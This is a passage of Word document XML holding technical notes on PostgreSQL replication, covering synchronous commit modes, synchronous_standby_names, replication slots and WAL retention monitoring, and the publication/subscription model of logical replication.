    <w:p w14:paraId="44946DD2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="0D45FAF1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>remote_apply:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B8A75F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Wait for replica to apply WAL to its data files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F9CDB6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Read-after-write consistency: writes are immediately visible on replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4855B607" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Highest latency (includes replica apply time, not just WAL transfer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B350E80" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7A03D0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>on (default when synchronous_standby_names is set):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF12F0F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Wait for replica to flush WAL to disk (fsync on replica)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA72CE3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Survives both primary crash and replica crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1771E386" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Balance of durability and performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0732441B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The synchronous_standby_names configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6B6AAB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E7F810" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>synchronous_standby_names = 'FIRST 1 (replica1, replica2, replica3)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032464C5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Wait for the FIRST 1 replica (from ordered list) to acknowledge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263A7CB6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="2CCF0CDD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>synchronous_standby_names = 'ANY 2 (replica1, replica2, replica3)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2D545A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Wait for ANY 2 replicas to acknowledge (quorum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C09C0E9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- More resilient: if replica1 is slow, replica2+replica3 can satisfy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3A77AC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="370DD0D6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>synchronous_standby_names = '*'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281162EE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Wait for ALL connected replicas (not recommended for production)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0D1F59" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Single slow replica blocks all commits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18787FD6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="61CCFACC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Performance impact of synchronous replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBE5DF2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Adds 1 RTT (network round trip) to every COMMIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1526CDBB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  For primary in us-east-1 and replica in us-west-2 (~70ms RTT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAF36FC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Each write transaction: +70ms latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DD0FEE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Write throughput: limited to 1000/70ms ≈ 14 transactions/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B8E1A6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    (vs potentially 100,000/second for async replication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B55C05" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669806ED" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Solution: place synchronous replica in same datacenter (low RTT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714EAD80" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Use asynchronous replicas in remote regions for geographic redundancy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72630DEB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Accept potential data loss for the cross-region replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D19EB7A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Protect against datacenter failure vs single-server failure separately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466B91F1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Replication slots — preventing WAL deletion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CAB699" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Without replication slots, the primary deletes WAL files once they've been sent to all connected replicas. If a replica disconnects and reconnects, the WAL it needs may be gone — requiring a full re-sync.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CBE293" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BFF6D1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Replication slot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6CB2D3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Name: unique identifier (e.g., "replica_us_west")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E152F15" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  confirmed_flush_lsn: LSN confirmed received and flushed by this replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBBF7B8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1B2570" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Primary guarantee: never delete WAL with LSN &gt; slot's confirmed_flush_lsn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F77FA21" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C37F8E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Even if replica is disconnected for days/weeks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0153EF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    WAL accumulates on primary (never deleted for this slot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FDE080" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Primary disk fills up → all writes eventually fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369A5ED3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3493B3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Monitoring critical:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B132C12" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    SELECT slot_name, confirmed_flush_lsn, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798E738B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">           pg_wal_lsn_diff(pg_current_wal_lsn(), confirmed_flush_lsn) AS lag_bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F3A6DC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    FROM pg_replication_slots;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6655406D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F95951F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Alert if lag_bytes &gt; threshold (e.g., 10GB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5886CC4F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    If replica offline for too long: drop the slot, accept that replica needs full resync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4658CAE4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576C5EA6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Slot vs wal_keep_size:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7377EDA1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    wal_keep_size: keep at least N MB of WAL regardless of replica position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE425D5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      Simpler, bounded disk usage, but may not be enough for slow replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8C4F64" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Replication slot: guarantees replica always has WAL, unbounded disk usage risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACEA891" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="7A1A8127">
          <v:rect id="_x0000_i5512" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35257242" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Logical Replication — Row-Level Change Streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789D0E90" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Physical vs Logical Replication — The Fundamental Difference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C449A2E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Physical replication</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> transmits byte-level changes to data files — it replicates the physical storage format. The replica is a byte-for-byte copy of the primary. Constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDBB7E5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1493"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Replica must run the same PostgreSQL major version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2A9639" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1493"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Replica must be on the same CPU architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D1CDDF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1493"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Entire instance is replicated — cannot replicate a subset of tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D38A3A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1493"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Replica is read-only (cannot be written to independently).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A9EF9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logical replication</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> decodes WAL records into logical operations (INSERT/UPDATE/DELETE on specific tables) and transmits those operations. The replica applies them as SQL operations. Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1861A760" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1494"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Can replicate a subset of tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755EDD72" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1494"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Can replicate to a different PostgreSQL version (for major version upgrades).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53625ADE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1494"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Can replicate to a completely different database system (Kafka, Elasticsearch, data warehouse).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F44EB9C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1494"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Replica can be written to independently (bidirectional replication possible).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120FAE45" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1494"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Can apply transformations during replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9D446F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL Logical Replication Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72575F71" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The publication/subscription model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF55B7A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC320AE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Publisher (primary):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C96004" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  CREATE PUBLICATION my_pub FOR TABLE users, orders, products;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63756B1E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- Or: FOR ALL TABLES (all current and future tables)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9B4CCB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  -- Or: FOR TABLE orders WHERE (status = 'active') (row filter, PostgreSQL 15+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DDDAFE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3427148C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Publication tracks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4C0345" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    - Which tables are included</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312641B0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    - Which operations (INSERT, UPDATE, DELETE, TRUNCATE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B2CBB0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    - Row filter predicates (PostgreSQL 15+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3CF51C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    - Column lists (PostgreSQL 16+) — replicate subset of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4693E24D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325D877B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Subscriber (replica):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4923358D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  CREATE SUBSCRIPTION my_sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CA4114" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    CONNECTION 'host=primary dbname=mydb user=replicator password=...'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782F9AD1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    PUBLICATION my_pub;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55533C1C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
